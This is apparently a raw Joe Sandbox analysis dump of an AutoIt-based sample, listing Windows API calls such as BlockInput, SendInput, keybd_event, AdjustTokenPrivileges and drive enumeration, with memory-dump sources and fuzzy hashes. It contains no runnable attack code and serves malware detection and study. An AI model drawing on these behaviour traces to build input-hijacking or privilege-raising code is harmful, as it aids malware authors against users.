                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002,00000000), ref: 00F25079
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002,00000000), ref: 00F25080
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00F25092
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ac51b29b5d52c5afc67bb8a6333e80ce3d6547ab299fa1075ce18767ec2b0230
                                                                                                                                                                                                                                                                                        • Instruction ID: 0e031271e28113bb7a7dac5ba716ff4f639dbbfcafb1a4de74b2a1d4ad30c387
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac51b29b5d52c5afc67bb8a6333e80ce3d6547ab299fa1075ce18767ec2b0230
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39E04632401508AFCF21AFA0ED08E483B6AEB10792F204014F8098A121DB3AED42EAC0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F6ED04
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: mouse_event
                                                                                                                                                                                                                                                                                        • String ID: DOWN
                                                                                                                                                                                                                                                                                        • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                                        • Opcode ID: 6c22df62016332b284cdfcab418beb793bba8a8c1fe1149d16e2d233ae74a959
                                                                                                                                                                                                                                                                                        • Instruction ID: fcb99053d51d0230f81d89be838700cc07567cbf9fcfc7b3489394b0df08092b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c22df62016332b284cdfcab418beb793bba8a8c1fe1149d16e2d233ae74a959
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97E08C2B1ED73639F98422187D07EF6234C8F22774B61428AF800E50C0EDA4AC82B5A9
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F5E664
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                                                                                                                                        • String ID: X64
                                                                                                                                                                                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                        • Opcode ID: b8a9abb2d3c9cb969ef4c4518e789c96e2b7a85eba39876af69e4ddcae7d9cba
                                                                                                                                                                                                                                                                                        • Instruction ID: 22598b2b87fa95c1b29d7cb6c4c87c3564b0663ae728f6c3e01019c796a5ea35
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8a9abb2d3c9cb969ef4c4518e789c96e2b7a85eba39876af69e4ddcae7d9cba
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CD0C9B581511DEACB80CF50EC88EDD73BCBB14304F100652F546A2000D7309648AB10
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F852EE,?,?,00000035,?), ref: 00F74229
                                                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F852EE,?,?,00000035,?), ref: 00F74239
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b69dd73eaab059cf8e2e498239de8ebf914c06253a0e1920cc156e70f257cfcd
                                                                                                                                                                                                                                                                                        • Instruction ID: e6bdd7624c88359b7a4c9f1a498db4c7c873c8c9318de5650c295d36dfb5bc0e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b69dd73eaab059cf8e2e498239de8ebf914c06253a0e1920cc156e70f257cfcd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACF0E5316002286AE7201765AC4DFEB7A6DEFC5761F10017AF509D2181DA709A00E6B1
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F6BC24
                                                                                                                                                                                                                                                                                        • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00F6BC37
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9eea3db1b1ae2f03b090f6fbc4d886a1fb62571d38e7185000348d8352814d79
                                                                                                                                                                                                                                                                                        • Instruction ID: f18488bc425ea1ace4a73f6c47bc19a07ef6968937a2cb9b6f71027e1dfdc86d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9eea3db1b1ae2f03b090f6fbc4d886a1fb62571d38e7185000348d8352814d79
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0F0677180024EABDB019FA4C806BBEBBB0FF08309F14800AF951EA192C7798201EF94
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F61B48), ref: 00F61A20
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00F61B48), ref: 00F61A35
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • BlockInput.USER32(00000001), ref: 00F7F51A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00F2075E), ref: 00F20D4A
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F8358D
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F835A0
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 00F835AF
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F835CA
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F835D1
                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00F83700
                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00F8370E
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83755
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00F83761
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F8379D
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837BF
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837D2
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837DD
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F837E6
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837F5
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F837FE
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83805
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F83810
                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83822
                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FA0C04,00000000), ref: 00F83838
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F83848
                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00F8386E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00F8388D
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F838AF
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83A9C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00F97B67
                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F97B98
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F97BA4
                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00F97BBE
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00F97BCD
                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F97BF8
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 00F97C00
                                                                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00F97C07
                                                                                                                                                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00F97C16
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F97C1D
                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00F97C68
                                                                                                                                                                                                                                                                                        • FillRect.USER32(?,?,?), ref: 00F97C9A
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F97CBC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColor.USER32(00000012), ref: 00F97E5B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SetTextColor.GDI32(?,00F97B2D), ref: 00F97E5F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColorBrush.USER32(0000000F), ref: 00F97E75
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColor.USER32(0000000F), ref: 00F97E80
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColor.USER32(00000011), ref: 00F97E9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F97EAB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SelectObject.GDI32(?,00000000), ref: 00F97EBC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SetBkColor.GDI32(?,?), ref: 00F97EC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SelectObject.GDI32(?,?), ref: 00F97ED2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00F97EF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F97F08
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetWindowLongW.USER32(?,000000F0), ref: 00F97F15
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 690b2c56c87f46bbee313c1d0eb0b2f781f19f97227d8a5c9d93bea5c6d5e8fe
                                                                                                                                                                                                                                                                                        • Instruction ID: 26e0e16863a811ae33c769ac16f41df5c3c5073605e856df9d80c86f2e3e20e4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690b2c56c87f46bbee313c1d0eb0b2f781f19f97227d8a5c9d93bea5c6d5e8fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89A1C772418305BFDB11AF64DC48E6BBBA9FF48330F240A1AFA62961E0D771D944EB51
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00F016B4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F42B07
                                                                                                                                                                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F42B40
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F42F85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F01488,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F01865
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00F42FC1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F42FD8
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F42FEE
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F42FF9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 6eb72f4ace6bb35171775eabf7ef98f65b86505766ce1b615a2861feadc92395
                                                                                                                                                                                                                                                                                        • Instruction ID: c947c17517878cd54a6f2c5a21f4269f2f9421a5fcf93a7536852dc71252b409
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6eb72f4ace6bb35171775eabf7ef98f65b86505766ce1b615a2861feadc92395
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA12B130A01205DFD765CF24CC94BA9BBF1FB44320F98456AF9559B2A1C732E886FB91
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00F8319B
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F832C7
                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F83306
                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F83316
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F8335D
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00F83369
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F833B2
                                                                                                                                                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F833C1
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F833D1
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F833D5
                                                                                                                                                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F833E5
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F833EE
                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00F833F7
                                                                                                                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F83423
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F8343A
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F8347A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F8348E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F8349F
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F834D4
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F834DF
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F834EA
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F834F4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                        • Opcode ID: 8696761b6cc56c0903293951c35495333e8538afc1e8d98da31872013b915ff4
                                                                                                                                                                                                                                                                                        • Instruction ID: 4943f953cafee442967d8b0a67923b1dd151292d38bc7c6bab4749916d61fa83
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8696761b6cc56c0903293951c35495333e8538afc1e8d98da31872013b915ff4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DB14E71A00219AFEB14DFB8CD49FAEBBA9EB48710F104115F915E72E0D774AD40EBA4
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F75532
                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00F9DC30,?,\\.\,00F9DCD0), ref: 00F7560F
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00F9DC30,?,\\.\,00F9DCD0), ref: 00F7577B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                        • Opcode ID: e38bb3c9625d2eb0125ab4318e951a30124ff9b248ba2f28db1a487003e50147
                                                                                                                                                                                                                                                                                        • Instruction ID: e56633d12cfed7fa29d60f9e5c69f0a0eb8ca1a22d8cd4779d00708528d4a10a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e38bb3c9625d2eb0125ab4318e951a30124ff9b248ba2f28db1a487003e50147
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4461A631A04A4ADBC718EF24CE92E7877A1EF54B54B24C05FE40E9B291C6A1DD42FB53
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F91BC4
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F91BD9
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F91BE0
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F91C35
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F91C55
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F91C89
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F91CA7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F91CB9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00F91CCE
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00F91CE1
                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 00F91D3D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00F91D58
